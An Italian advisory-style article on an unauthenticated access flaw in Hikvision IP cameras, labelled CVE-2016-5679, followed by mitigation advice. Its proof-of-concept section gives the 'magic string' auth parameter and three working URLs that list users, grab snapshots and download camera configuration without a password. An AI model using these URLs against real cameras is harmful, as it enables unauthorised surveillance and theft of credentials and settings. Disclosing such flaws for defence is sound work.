Exploit Hikvision Camera - Esecuzione remota di comandi

Exploit Hikvision Camera – Esecuzione remota di comandi

Una vulnerabilità critica è stata scoperta nella telecamera IP Hikvision, che consente l’esecuzione remota di comandi senza autenticazione. La vulnerabilità, con identificativo CVE-2016-5679, è stata classificata come ad alto rischio, con un prezzo di 10.000 dollari per l’acquisto dell’exploit.

Hikvision Camera, dettagli della vulnerabilità

La vulnerabilità riguarda l’inclusione di un “magic string” che permette l’accesso istantaneo a qualsiasi telecamera Hikvision, indipendentemente dalla password dell’amministratore. Basta aggiungere questa stringa ai comandi della telecamera Hikvision: (?auth=YWRtaW46MTEK).

Impatto della vulnerabilità

Questa vulnerabilità permette a un utente malintenzionato di:

  • Ottenere una lista di tutti gli utenti e i loro ruoli
  • Ottenere uno snapshot della telecamera senza autenticazione
  • Scaricare la configurazione della telecamera

Prove di concetto

  • Recuperare una lista di tutti gli utenti e i loro ruoli:
    http://camera.ip/Security/users?auth=YWRtaW46MTEK
  • Ottenere uno snapshot della telecamera senza autenticazione:
    http://camera.ip/onvif-http/snapshot?auth=YWRtaW46MTEK
  • Scaricare la configurazione della telecamera:
    http://camera.ip/System/configurationFile?auth=YWRtaW46MTEK

Misure di mitigazione

Per mitigare il rischio di questa vulnerabilità, gli utenti dovrebbero:

  1. Aggiornare il firmware della telecamera Hikvision alla versione più recente
  2. Cambiare la password dell’amministratore
  3. Limitare l’accesso alla telecamera solo alle reti affidabili
  4. Monitorare attentamente il traffico di rete in ingresso e in uscita dalla telecamera

La vulnerabilità CVE-2016-5679 nella telecamera IP Hikvision è una minaccia critica che potrebbe consentire a un utente malintenzionato di ottenere l’accesso e il controllo della telecamera. Gli utenti dovrebbero aggiornare il firmware, cambiare la password dell’amministratore, limitare l’accesso alla rete e monitorare attentamente il traffico di rete per mitigare il rischio di questa vulnerabilità.

Suggerimenti, soluzioni, consigli e best practice:

  • Aggiornare il firmware della telecamera Hikvision alla versione più recente
  • Cambiare la password dell’amministratore con una password forte e unica
  • Limitare l’accesso alla telecamera solo alle reti affidabili, come la rete locale
  • Monitorare attentamente il traffico di rete in ingresso e in uscita dalla telecamera
  • Configurare le impostazioni di sicurezza della telecamera in base alle best practice di sicurezza
  • Considerare l’utilizzo di un firewall per bloccare il traffico non autorizzato alla telecamera
  • Considerare l’utilizzo di un sistema di monitoraggio della sicurezza per rilevare e prevenire attacchi alla telecamera
  • Tenersi informati sulle ultime vulnerabilità e minacce alla sicurezza degli apparati Hikvision
  • Collaborare con il team di sicurezza di Hikvision per segnalare e mitigare le vulnerabilità
  • Educare gli utenti sulla sicurezza delle telecamere IP e sulla necessità di adottare misure di sicurezza appropriate

Fonte: http://exploitalert.com/view-details.html?id=40400

Torna in alto